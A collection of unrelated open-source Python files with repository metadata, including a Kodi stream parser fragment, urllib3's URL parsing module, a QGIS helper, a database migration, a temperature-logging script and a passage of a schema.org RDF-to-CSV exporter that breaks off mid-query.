command["params"] = txt[len(command["command"]) + 1:-1]
return command
for convCommand in convCommands:
pComm = parseCommand(convCommand)
command = pComm["command"]
params = pComm["params"]
if params.find('@REFERER@'):
referer = item['referer']
if not referer:
referer = ''
params = params.replace('@REFERER@', referer)
if command == 'convDate':
src = cc.convDate(params, src)
elif command == 'convTimestamp':
src = cc.convTimestamp(params, src)
elif command == 'select':
src = cc.select(params, src)
if not src:
continue
elif command == 'unicode_escape':
src = src.decode('unicode-escape')
elif command == 'replaceFromDict':
dictName = str(params.strip('\''))
path = os.path.join(common.Paths.dictsDir, dictName + '.txt')
if not (os.path.exists(path)):
common.log('Dictionary file not found: ' + path)
continue
src = cc.replaceFromDict(path, src)
elif command == 'time':
src = time.time()
elif command == 'timediff':
src = dt.timediff(src,params.strip('\''))
elif command == 'offset':
src = cc.offset(params, src)
elif command == 'getSource':
src = cc.getSource(params, src)
elif command == 'quote':
try:
src = urllib.quote(params.strip("'").replace('%s', src),'')
except:
cleanParams = params.strip("'")
cleanParams = cleanParams.replace("%s",src)
src = urllib.quote(cleanParams.encode('utf-8'),'')
elif command == 'unquote':
src = urllib.unquote(params.strip("'").replace('%s', src))
elif command == 'parseText':
src = cc.parseText(item, params, src)
elif command == 'getInfo':
src = cc.getInfo(item, params, src)
elif command == 'getXML':
src = cc.getInfo(item, params, src, xml=True)
elif command == 'getMobile':
src = cc.getInfo(item, params, src, mobile=True)
elif command == 'decodeBase64':
src = cc.decodeBase64(src)
elif command == 'decodeRawUnicode':
src = cc.decodeRawUnicode(src)
elif command == 'resolve':
src = cc.resolve(src)
elif command == 'decodeXppod':
src = cc.decodeXppod(src)
elif command == 'decodeXppodHLS':
src = cc.decodeXppod_hls(src)
elif command == 'replace':
src = cc.replace(params, src)
elif command == 'replaceRegex':
src = cc.replaceRegex(params, src)
elif command == 'ifEmpty':
src = cc.ifEmpty(item, params, src)
elif command == 'isEqual':
src = cc.isEqual(item, params, src)
elif command == 'ifFileExists':
src = cc.ifFileExists(item, params, src)
elif command == 'ifExists':
src = cc.ifExists(item, params, src)
elif command == 'encryptJimey':
src = crypt.encryptJimey(params.strip("'").replace('%s', src))
elif command == 'gAesDec':
src = crypt.gAesDec(src,item.infos[params])
elif command == 'getCookies':
src = cc.getCookies(params, src)
elif command == 'destreamer':
src = crypt.destreamer(params.strip("'").replace('%s', src))
elif command == 'unixTimestamp':
src = dt.getUnixTimestamp()
elif command == 'rowbalance':
src = rb.get()
elif command == 'urlMerge':
src = cc.urlMerge(params, src)
elif command == 'translate':
try:
src = common.translate(int(src))
except:
pass
elif command == 'camelcase':
src = string.capwords(string.capwords(src, '-'))
elif command == 'lowercase':
src = string.lower(src)
elif command == 'reverse':
src = src[::-1]
elif command == 'demystify':
print 'demystify'
src = crypt.doDemystify(src)
print 'after demystify',src
elif command == 'random':
paramArr = params.split(',')
minimum = int(paramArr[0])
maximum = int(paramArr[1])
src = str(random.randrange(minimum,maximum))
elif command == 'debug':
common.log('Debug from cfg file: ' + src)
elif command == 'divide':
paramArr = params.split(',')
a = paramArr[0].strip().strip("'").replace('%s', src)
a = resolveVariable(a, item)
b = paramArr[1].strip().strip("'").replace('%s', src)
b = resolveVariable(b, item)
if not a or not b:
continue
a = int(a)
b = int(b)
try:
src = str(a/b)
except:
pass
return src
def resolveVariable(varStr, item):
if varStr.startswith('@') and varStr.endswith('@'):
return item.getInfo(varStr.strip('@'))
return varStr
def firstNonEmpty(tmp, variables):
for v in variables:
vClean = v.strip()
if vClean.find("'") != -1:
vClean = vClean.strip("'")
else:
vClean = tmp.getInfo(vClean)
if vClean != '':
return vClean
return ''
|
Crach1015/plugin.video.superpack
|
zip/plugin.video.SportsDevil/lib/parser.py
|
Python
|
gpl-2.0
| 26,568 | 0.00478 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
r_mapcalc.py
------------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
def checkParameterValuesBeforeExecuting(alg, parameters, context):
""" Verify if we have the right parameters """
if (alg.parameterAsString(parameters, 'expression', context)
and alg.parameterAsString(parameters, 'file', context)):
return False, alg.tr("You need to set either inline expression or a rules file!")
return True, None
def processInputs(alg, parameters, context, feedback):
# We will use the same raster names than in QGIS to name the rasters in GRASS
rasters = alg.parameterAsLayerList(parameters, 'maps', context)
for idx, raster in enumerate(rasters):
rasterName = os.path.splitext(
os.path.basename(raster.source()))[0]
alg.inputLayers.append(raster)
alg.setSessionProjectionFromLayer(raster)
command = 'r.in.gdal input="{0}" output="{1}" --overwrite -o'.format(
os.path.normpath(raster.source()),
rasterName)
alg.commands.append(command)
alg.removeParameter('maps')
alg.postInputs()
def processCommand(alg, parameters, context, feedback):
alg.processCommand(parameters, context, feedback, True)
def processOutputs(alg, parameters, context, feedback):
# We need to export every raster from the GRASSDB
alg.exportRasterLayersIntoDirectory('output_dir',
parameters, context,
wholeDB=True)
|
dwadler/QGIS
|
python/plugins/processing/algs/grass7/ext/r_mapcalc.py
|
Python
|
gpl-2.0
| 2,550 | 0.000786 |
# -*-coding:UTF-8 -*
import sqlite3 as sql
import json
from time import time, strftime
import settings
import logging as lgn
lgn.basicConfig(filename = '/db/db.log',level=lgn.DEBUG,\
format='%(asctime)s %(message)s')
def logit(string,*level):
if(len(level) == 0):
lgn.info(string)
else:
if(level[0] == 10):
lgn.debug(string)
elif(level[0] == 20):
lgn.info(string)
elif(level[0] == 30):
lgn.warning(string)
elif(level[0] == 40):
lgn.error(string)
else:
lgn.critical(string)
def clean_listings():
conn,c = get_conn()
#first the easy thing: let's delete all the listings that are not
#linked to any search anymore
c.execute('''delete from listings where id not in
(select listingid from search_listings)''')
conn.commit()
#now let's delete all the listings older than max age
max_age = time() - settings.n_days_before_del * 86400
c.execute('''delete from listings where date_added <= ?''',(max_age,))
conn.commit()
def get_conn():
conn = sql.connect("/db/spider_nest.db")
c = conn.cursor()
c.execute('''PRAGMA foreign_keys = ON''')
return conn,c
def add_error_listings(site,conn,c):
siteid = c.execute('select id from websites where url = ?',(site,)).fetchone()
searches = c.execute('select id from searches where websiteid = ?',siteid).fetchall()
try:
c.execute('''insert into listings(websiteid,desc,webid,img,url,date_added) values(
?,'NO PLUGIN AVAILABLE','NA','NA','NA',?)''',(siteid[0],time()))
except sql.IntegrityError:
logit('tried to add a no plugin available listing for {} twice. Normal behaviour.'.format(site))
#nothing fancy here, we just tried to add a no plugin available listing
#twice, since it's already there our work here is done
return
listingid = c.execute('select id from listings where websiteid = ?',siteid).fetchone()
for s in searches:
c.execute('''insert into search_listings(searchid,listingid)
values(?,?)''',(s[0],listingid[0]))
conn.commit()
|
ForgottenBeast/spider_nest
|
database/utils.py
|
Python
|
gpl-3.0
| 2,171 | 0.015661 |
import re
from typing import Container, NamedTuple, Optional, overload
from ..exceptions import LocationParseError
from .util import to_str
# We only want to normalize urls with an HTTP(S) scheme.
# urllib3 infers URLs without a scheme (None) to be http.
_NORMALIZABLE_SCHEMES = ("http", "https", None)
# Almost all of these patterns were derived from the
# 'rfc3986' module: https://github.com/python-hyper/rfc3986
_PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}")
_SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)")
_URI_RE = re.compile(
r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?"
r"(?://([^\\/?#]*))?"
r"([^?#]*)"
r"(?:\?([^#]*))?"
r"(?:#(.*))?$",
re.UNICODE | re.DOTALL,
)
_IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
_HEX_PAT = "[0-9A-Fa-f]{1,4}"
_LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=_HEX_PAT, ipv4=_IPV4_PAT)
_subs = {"hex": _HEX_PAT, "ls32": _LS32_PAT}
_variations = [
# 6( h16 ":" ) ls32
"(?:%(hex)s:){6}%(ls32)s",
# "::" 5( h16 ":" ) ls32
"::(?:%(hex)s:){5}%(ls32)s",
# [ h16 ] "::" 4( h16 ":" ) ls32
"(?:%(hex)s)?::(?:%(hex)s:){4}%(ls32)s",
# [ *1( h16 ":" ) h16 ] "::" 3( h16 ":" ) ls32
"(?:(?:%(hex)s:)?%(hex)s)?::(?:%(hex)s:){3}%(ls32)s",
# [ *2( h16 ":" ) h16 ] "::" 2( h16 ":" ) ls32
"(?:(?:%(hex)s:){0,2}%(hex)s)?::(?:%(hex)s:){2}%(ls32)s",
# [ *3( h16 ":" ) h16 ] "::" h16 ":" ls32
"(?:(?:%(hex)s:){0,3}%(hex)s)?::%(hex)s:%(ls32)s",
# [ *4( h16 ":" ) h16 ] "::" ls32
"(?:(?:%(hex)s:){0,4}%(hex)s)?::%(ls32)s",
# [ *5( h16 ":" ) h16 ] "::" h16
"(?:(?:%(hex)s:){0,5}%(hex)s)?::%(hex)s",
# [ *6( h16 ":" ) h16 ] "::"
"(?:(?:%(hex)s:){0,6}%(hex)s)?::",
]
_UNRESERVED_PAT = (
r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._!\-~"
)
_IPV6_PAT = "(?:" + "|".join([x % _subs for x in _variations]) + ")"
_ZONE_ID_PAT = "(?:%25|%)(?:[" + _UNRESERVED_PAT + "]|%[a-fA-F0-9]{2})+"
_IPV6_ADDRZ_PAT = r"\[" + _IPV6_PAT + r"(?:" + _ZONE_ID_PAT + r")?\]"
_REG_NAME_PAT = r"(?:[^\[\]%:/?#]|%[a-fA-F0-9]{2})*"
_TARGET_RE = re.compile(r"^(/[^?#]*)(?:\?([^#]*))?(?:#.*)?$")
_IPV4_RE = re.compile("^" + _IPV4_PAT + "$")
_IPV6_RE = re.compile("^" + _IPV6_PAT + "$")
_IPV6_ADDRZ_RE = re.compile("^" + _IPV6_ADDRZ_PAT + "$")
_BRACELESS_IPV6_ADDRZ_RE = re.compile("^" + _IPV6_ADDRZ_PAT[2:-2] + "$")
_ZONE_ID_RE = re.compile("(" + _ZONE_ID_PAT + r")\]$")
_HOST_PORT_PAT = ("^(%s|%s|%s)(?::([0-9]{0,5}))?$") % (
_REG_NAME_PAT,
_IPV4_PAT,
_IPV6_ADDRZ_PAT,
)
_HOST_PORT_RE = re.compile(_HOST_PORT_PAT, re.UNICODE | re.DOTALL)
_UNRESERVED_CHARS = set(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-~"
)
_SUB_DELIM_CHARS = set("!$&'()*+,;=")
_USERINFO_CHARS = _UNRESERVED_CHARS | _SUB_DELIM_CHARS | {":"}
_PATH_CHARS = _USERINFO_CHARS | {"@", "/"}
_QUERY_CHARS = _FRAGMENT_CHARS = _PATH_CHARS | {"?"}
class Url(
NamedTuple(
"Url",
[
("scheme", Optional[str]),
("auth", Optional[str]),
("host", Optional[str]),
("port", Optional[int]),
("path", Optional[str]),
("query", Optional[str]),
("fragment", Optional[str]),
],
)
):
"""
Data structure for representing an HTTP URL. Used as a return value for
:func:`parse_url`. Both the scheme and host are normalized as they are
both case-insensitive according to RFC 3986.
"""
def __new__( # type: ignore[no-untyped-def]
cls,
scheme: Optional[str] = None,
auth: Optional[str] = None,
host: Optional[str] = None,
port: Optional[int] = None,
path: Optional[str] = None,
query: Optional[str] = None,
fragment: Optional[str] = None,
):
if path and not path.startswith("/"):
path = "/" + path
if scheme is not None:
scheme = scheme.lower()
return super().__new__(cls, scheme, auth, host, port, path, query, fragment)
@property
def hostname(self) -> Optional[str]:
"""For backwards-compatibility with urlparse. We're nice like that."""
return self.host
@property
def request_uri(self) -> str:
"""Absolute path including the query string."""
uri = self.path or "/"
if self.query is not None:
uri += "?" + self.query
return uri
@property
def authority(self) -> Optional[str]:
"""
Authority component as defined in RFC 3986 3.2.
This includes userinfo (auth), host and port.
i.e.
userinfo@host:port
"""
userinfo = self.auth
netloc = self.netloc
if netloc is None or userinfo is None:
return netloc
else:
return f"{userinfo}@{netloc}"
@property
def netloc(self) -> Optional[str]:
"""
Network location including host and port.
If you need the equivalent of urllib.parse's ``netloc``,
use the ``authority`` property instead.
"""
if self.host is None:
return None
if self.port:
return f"{self.host}:{self.port}"
return self.host
@property
def url(self) -> str:
"""
Convert self into a url
This function should more or less round-trip with :func:`.parse_url`. The
returned url may not be exactly the same as the url inputted to
:func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls
with a blank port will have : removed).
Example:
.. code-block:: python
import urllib3
U = urllib3.util.parse_url("https://google.com/mail/")
print(U.url)
# "https://google.com/mail/"
print( urllib3.util.Url("https", "username:password",
"host.com", 80, "/path", "query", "fragment"
).url
)
# "https://username:[email protected]:80/path?query#fragment"
"""
scheme, auth, host, port, path, query, fragment = self
url = ""
# We use "is not None" we want things to happen with empty strings (or 0 port)
if scheme is not None:
url += scheme + "://"
if auth is not None:
url += auth + "@"
if host is not None:
url += host
if port is not None:
url += ":" + str(port)
if path is not None:
url += path
if query is not None:
url += "?" + query
if fragment is not None:
url += "#" + fragment
return url
def __str__(self) -> str:
return self.url
@overload
def _encode_invalid_chars(
component: str, allowed_chars: Container[str]
) -> str: # Abstract
...
@overload
def _encode_invalid_chars(
component: None, allowed_chars: Container[str]
) -> None: # Abstract
...
def _encode_invalid_chars(
component: Optional[str], allowed_chars: Container[str]
) -> Optional[str]:
"""Percent-encodes a URI component without reapplying
onto an already percent-encoded component.
"""
if component is None:
return component
component = to_str(component)
# Normalize existing percent-encoded bytes.
# Try to see if the component we're encoding is already percent-encoded
# so we can skip all '%' characters but still encode all others.
component, percent_encodings = _PERCENT_RE.subn(
lambda match: match.group(0).upper(), component
)
uri_bytes = component.encode("utf-8", "surrogatepass")
is_percent_encoded = percent_encodings == uri_bytes.count(b"%")
encoded_component = bytearray()
for i in range(0, len(uri_bytes)):
# Will return a single character bytestring
byte = uri_bytes[i : i + 1]
byte_ord = ord(byte)
if (is_percent_encoded and byte == b"%") or (
byte_ord < 128 and byte.decode() in allowed_chars
):
encoded_component += byte
continue
encoded_component.extend(b"%" + (hex(byte_ord)[2:].encode().zfill(2).upper()))
return encoded_component.decode()
def _remove_path_dot_segments(path: str) -> str:
# See http://tools.ietf.org/html/rfc3986#section-5.2.4 for pseudo-code
segments = path.split("/") # Turn the path into a list of segments
output = [] # Initialize the variable to use to store output
for segment in segments:
# '.' is the current directory, so ignore it, it is superfluous
if segment == ".":
continue
# Anything other than '..', should be appended to the output
if segment != "..":
output.append(segment)
# In this case segment == '..', if we can, we should pop the last
# element
elif output:
output.pop()
# If the path starts with '/' and the output is empty or the first string
# is non-empty
if path.startswith("/") and (not output or output[0]):
output.insert(0, "")
# If the path starts with '/.' or '/..' ensure we add one more empty
# string to add a trailing '/'
if path.endswith(("/.", "/..")):
output.append("")
return "/".join(output)
def _normalize_host(host: Optional[str], scheme: Optional[str]) -> Optional[str]:
if host:
if scheme in _NORMALIZABLE_SCHEMES:
is_ipv6 = _IPV6_ADDRZ_RE.match(host)
if is_ipv6:
match = _ZONE_ID_RE.search(host)
if match:
start, end = match.span(1)
zone_id = host[start:end]
if zone_id.startswith("%25") and zone_id != "%25":
zone_id = zone_id[3:]
else:
zone_id = zone_id[1:]
zone_id = _encode_invalid_chars(zone_id, _UNRESERVED_CHARS)
return f"{host[:start].lower()}%{zone_id}{host[end:]}"
else:
return host.lower()
elif not _IPV4_RE.match(host):
return to_str(
b".".join([_idna_encode(label) for label in host.split(".")]),
"ascii",
)
return host
def _idna_encode(name: str) -> bytes:
if name and any([ord(x) > 128 for x in name]):
try:
import idna
except ImportError:
raise LocationParseError(
"Unable to parse URL without the 'idna' module"
) from None
try:
return idna.encode(name.lower(), strict=True, std3_rules=True)
except idna.IDNAError:
raise LocationParseError(
f"Name '{name}' is not a valid IDNA label"
) from None
return name.lower().encode("ascii")
def _encode_target(target: str) -> str:
"""Percent-encodes a request target so that there are no invalid characters
Pre-condition for this function is that 'target' must start with '/'.
If that is the case then _TARGET_RE will always produce a match.
"""
match = _TARGET_RE.match(target)
if not match: # Defensive:
raise LocationParseError(f"{target!r} is not a valid request URI")
path, query = match.groups()
encoded_target = _encode_invalid_chars(path, _PATH_CHARS)
if query is not None:
query = _encode_invalid_chars(query, _QUERY_CHARS)
encoded_target += "?" + query
return encoded_target
def parse_url(url: str) -> Url:
"""
Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is
performed to parse incomplete urls. Fields not provided will be None.
This parser is RFC 3986 compliant.
The parser logic and helper functions are based heavily on
work done in the ``rfc3986`` module.
:param str url: URL to parse into a :class:`.Url` namedtuple.
Partly backwards-compatible with :mod:`urlparse`.
Example:
.. code-block:: python
import urllib3
print( urllib3.util.parse_url('http://google.com/mail/'))
# Url(scheme='http', host='google.com', port=None, path='/mail/', ...)
print( urllib3.util.parse_url('google.com:80'))
# Url(scheme=None, host='google.com', port=80, path=None, ...)
print( urllib3.util.parse_url('/foo?bar'))
# Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...)
"""
if not url:
# Empty
return Url()
source_url = url
if not _SCHEME_RE.search(url):
url = "//" + url
scheme: Optional[str]
authority: Optional[str]
auth: Optional[str]
host: Optional[str]
port: Optional[str]
port_int: Optional[int]
path: Optional[str]
query: Optional[str]
fragment: Optional[str]
try:
scheme, authority, path, query, fragment = _URI_RE.match(url).groups() # type: ignore[union-attr]
normalize_uri = scheme is None or scheme.lower() in _NORMALIZABLE_SCHEMES
if scheme:
scheme = scheme.lower()
if authority:
auth, _, host_port = authority.rpartition("@")
auth = auth or None
host, port = _HOST_PORT_RE.match(host_port).groups() # type: ignore[union-attr]
if auth and normalize_uri:
auth = _encode_invalid_chars(auth, _USERINFO_CHARS)
if port == "":
port = None
else:
auth, host, port = None, None, None
if port is not None:
port_int = int(port)
if not (0 <= port_int <= 65535):
raise LocationParseError(url)
else:
port_int = None
host = _normalize_host(host, scheme)
if normalize_uri and path:
path = _remove_path_dot_segments(path)
path = _encode_invalid_chars(path, _PATH_CHARS)
if normalize_uri and query:
query = _encode_invalid_chars(query, _QUERY_CHARS)
if normalize_uri and fragment:
fragment = _encode_invalid_chars(fragment, _FRAGMENT_CHARS)
except (ValueError, AttributeError) as e:
raise LocationParseError(source_url) from e
# For the sake of backwards compatibility we put empty
# string values for path if there are any defined values
# beyond the path in the URL.
# TODO: Remove this when we break backwards compatibility.
if not path:
if query is not None or fragment is not None:
path = ""
else:
path = None
return Url(
scheme=scheme,
auth=auth,
host=host,
port=port_int,
path=path,
query=query,
fragment=fragment,
)
|
urllib3/urllib3
|
src/urllib3/util/url.py
|
Python
|
mit
| 14,809 | 0.000743 |
#!/usr/bin/env python
import argparse
import datetime
import os
import re
import requests
import subprocess
import sys
import time
import xively
DEBUG = os.environ["DEBUG"] or false
def read_temperature(from_file):
if DEBUG:
print "Reading temperature from file: %s" % from_file
temperature = None
with open(from_file, 'r') as f:
crc = f.readline()
reading = f.readline()
matches = re.search('t=(\d+)', reading)
if matches:
temperature = float(matches.group(1)) / 1000.0
return temperature
def get_datastream(feed, name):
try:
datastream = feed.datastreams.get(name)
if DEBUG:
print "Found existing datastream"
return datastream
except:
if DEBUG:
print "Creating new datastream"
datastream = feed.datastreams.create(name, tags="units=celsius")
return datastream
def run():
parser = argparse.ArgumentParser(description = 'Push a metric to Xively')
parser.add_argument('--feed', type=str, required=True, help='your Xively feed ID')
parser.add_argument('--key', type=str, required=True, help='your Xively API key')
parser.add_argument('--name', type=str, default='temperature0', help='your Xively datastream name')
parser.add_argument('--file', type=str, required=True, help='the file from which to read the temperature')
args = parser.parse_args()
api = xively.XivelyAPIClient(args.key)
feed = api.feeds.get(args.feed)
datastream = get_datastream(feed, args.name)
datastream.max_value = None
datastream.min_value = None
while True:
temperature = read_temperature(args.file)
if DEBUG:
print "Updating Xively feed with value: %s" % temperature
datastream.current_value = temperature
datastream.at = datetime.datetime.utcnow()
try:
datastream.update()
except Exception as err:
sys.stderr.write('ERROR: %s\n' % str(err))
print "Updated Xively feed, sleeping..."
time.sleep(60)
run()
|
dwc/pi-monitoring
|
bin/push_temperature.py
|
Python
|
mit
| 1,946 | 0.018499 |
# Copyright 2015 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This package contains Linux OS distribution extensions
"""
|
tcpcloud/openvstorage
|
ovs/extensions/os/__init__.py
|
Python
|
apache-2.0
| 644 | 0 |
"""db migration
Revision ID: 373a21295ab
Revises: 21f5b2d3905d
Create Date: 2015-05-05 15:42:33.474470
"""
# revision identifiers, used by Alembic.
revision = '373a21295ab'
down_revision = '21f5b2d3905d'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.drop_table('items')
items = op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now(),
nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False))
def downgrade():
op.drop_table('items')
op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now()))
|
Mytho/groceries-api
|
db/versions/20150505_154233_373a21295ab_db_migration.py
|
Python
|
mit
| 1,244 | 0.003215 |
from ..library.base import number_to_list
def solve(bound: int=100):
maximal = 0
for a in range(bound):
for b in range(bound):
sum_digits = sum(number_to_list(a ** b))
if sum_digits > maximal:
maximal = sum_digits
return maximal
|
cryvate/project-euler
|
project_euler/solutions/problem_56.py
|
Python
|
mit
| 294 | 0.006803 |
# (C) Copyright 2011 Nuxeo SAS <http://nuxeo.com>
# Author: [email protected]
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# 02111-1307, USA.
#
"""Classes that render statistics in emacs org-mode format.
"""
import re
from ReportRenderRst import RenderRst
from ReportRenderRst import BaseRst
import ReportRenderRst
from MonitorPlugins import MonitorPlugins
FL_SITE = "http://funkload.nuxeo.org"
def org_title(title, level=1, newpage=True):
"""Return an org section."""
org = []
if newpage:
org.append("")
org.append("")
org.append("#+BEGIN_LaTeX")
org.append("\\newpage")
org.append('#+END_LaTeX')
org.append('*' * (level - 1) + ' ' + title + '\n')
return '\n'.join(org)
def org_image(self):
org = ["#+BEGIN_LaTeX"]
org.append('\\begin{center}')
for image_name in self.image_names:
org.append("\includegraphics[scale=0.5]{{./%s}.png}" % image_name)
org.append('\\end{center}')
org.append('#+END_LaTeX')
return '\n'.join(org) + '\n'
def org_header(self, with_chart=False):
headers = self.headers[:]
if self.with_percentiles:
self._attach_percentiles_header(headers)
org = [self.render_image()]
org.append("#+BEGIN_LaTeX")
org.append("\\tiny")
org.append('#+END_LaTeX')
org.append(' |' + '|'.join(headers) + '|\n |-')
return '\n'.join(org)
def org_footer(self):
org = [' |-']
org.append("#+BEGIN_LaTeX")
org.append("\\normalsize")
org.append('#+END_LaTeX')
return '\n'.join(org)
ReportRenderRst.rst_title = org_title
ReportRenderRst.LI = '-'
BaseRst.render_header = org_header
BaseRst.render_footer = org_footer
BaseRst.render_image = org_image
BaseRst.sep = '|'
class RenderOrg(RenderRst):
"""Render stats in ReST format."""
# number of slowest requests to display
slowest_items = 5
with_chart = True
def __init__(self, config, stats, error, monitor, monitorconfig, options):
options.html = True
RenderRst.__init__(self, config, stats, error, monitor, monitorconfig, options)
def renderHeader(self):
config = self.config
self.append('# -*- mode: org -*-')
self.append('#+TITLE: FunkLoad bench report')
self.append('#+DATE: ' + self.date)
self.append('''#+STYLE: <link rel="stylesheet" type="text/css" href="eon.css" />
#+LaTeX_CLASS: koma-article
#+LaTeX_CLASS_OPTIONS: [a4paper,landscape]
#+LATEX_HEADER: \usepackage[utf8]{inputenc}
#+LATEX_HEADER: \usepackage[en]{babel}
#+LATEX_HEADER: \usepackage{fullpage}
#+LATEX_HEADER: \usepackage[hyperref,x11names]{xcolor}
#+LATEX_HEADER: \usepackage[colorlinks=true,urlcolor=SteelBlue4,linkcolor=Firebrick4]{hyperref}
#+LATEX_HEADER: \usepackage{graphicx}
#+LATEX_HEADER: \usepackage[T1]{fontenc}''')
description = [config['class_description']]
description += ["Bench result of ``%s.%s``: " % (config['class'],
config['method'])]
description += [config['description']]
self.append('#+TEXT: Bench result of =%s.%s=: %s' % (
config['class'], config['method'], ' '.join(description)))
self.append('#+OPTIONS: toc:1')
self.append('')
def renderMonitor(self, host, charts):
"""Render a monitored host."""
description = self.config.get(host, '')
self.append(org_title("%s: %s" % (host, description), 3))
for chart in charts:
self.append('#+BEGIN_LaTeX')
self.append('\\begin{center}')
self.append("\includegraphics[scale=0.5]{{./%s}.png}" % chart[1])
self.append('\\end{center}')
self.append('#+END_LaTeX')
def renderHook(self):
self.rst = [line.replace('``', '=') for line in self.rst]
lapdex = "Apdex_{%s}" % str(self.options.apdex_t)
kv = re.compile("^(\ *\- [^\:]*)\:(.*)")
bold = re.compile("\*\*([^\*]+)\*\*")
link = re.compile("\`([^\<]+)\<([^\>]+)\>\`\_")
ret = []
for line in self.rst:
line = re.sub(kv, lambda m: "%s :: %s\n\n" % (
m.group(1), m.group(2)), line)
line = re.sub(bold, lambda m: "*%s*" % (m.group(1)),
line)
line = re.sub(link, lambda m: "[[%s][%s]]" % (m.group(2),
m.group(1).strip()),
line)
line = line.replace('|APDEXT|', lapdex)
line = line.replace('Apdex*', lapdex)
line = line.replace('Apdex T', 'Apdex_{T}')
line = line.replace('FunkLoad_',
'[[%s][FunkLoad]]' % FL_SITE)
ret.append(line)
self.rst = ret
def createMonitorCharts(self):
"""Create all montirored server charts."""
if not self.monitor or not self.with_chart:
return
self.append(org_title("Monitored hosts", 2))
charts = {}
for host in self.monitor.keys():
charts[host] = self.createMonitorChart(host)
return charts
def createMonitorChart(self, host):
"""Create monitrored server charts."""
charts = []
Plugins = MonitorPlugins()
Plugins.registerPlugins()
Plugins.configure(self.getMonitorConfig(host))
for plugin in Plugins.MONITORS.values():
image_path = ('%s_%s' % (host, plugin.name)).replace("\\", "/")
charts.append((plugin.name, image_path))
return charts
|
mozilla-services/FunkLoad
|
src/funkload/ReportRenderOrg.py
|
Python
|
gpl-2.0
| 6,127 | 0.003754 |
# -*- encoding: utf-8 -*-
# Module iainfgen
from numpy import *
def iainfgen(f, Iab):
from iaunion import iaunion
from iadil import iadil
from ianeg import ianeg
A, Bc = Iab
y = iaunion( iadil(f, A), iadil( ianeg(f), Bc))
return y
|
mariecpereira/IA369Z
|
deliver/ia870/iainfgen.py
|
Python
|
mit
| 261 | 0.019157 |
import csv
import rdflib
from rdflib.namespace import RDFS, RDF, OWL
from rdflib.term import URIRef
import threading
from apimarkdown import Markdown
from apirdflib import RDFLIBLOCK
import logging
logging.basicConfig(level=logging.INFO) # dev_appserver.py --log_level debug .
log = logging.getLogger(__name__)
class sdordf2csv():
def __init__(self, queryGraph=None, fullGraph=None, markdownComments=True,excludeAttic=False):
self.setqueryGraph(queryGraph)
self.setfullGraph(fullGraph)
self.setexcludeAttic(excludeAttic)
self.setmarkdownComments(markdownComments)
def setqueryGraph(self,graph=None):
self.queryGraph = graph
def setfullGraph(self,graph=None):
self.fullGraph = graph
def setexcludeAttic(self,state):
self.excludeAttic = state
def setmarkdownComments(self,state):
self.markdown = state
def doQuery(self,graph=None,query=None):
res = None
try:
RDFLIBLOCK.acquire()
res = list(graph.query(query))
finally:
RDFLIBLOCK.release()
return res
def outputCSVtypes(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a ?type.
BIND(STR(?term) AS ?strVal)
FILTER NOT EXISTS {?term a rdf:Property}.
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term
''') % atticfilter
try:
RDFLIBLOCK.acquire()
types = list(self.queryGraph.query(query))
finally:
RDFLIBLOCK.release()
#log.info( "Types: %s" % len(types))
self.type2CSV(header=True,out=file)
for t in types:
self.type2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def outputCSVproperties(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a rdf:Property.
FILTER EXISTS {?term rdfs:label ?l}.
BIND(STR(?term) AS ?strVal).
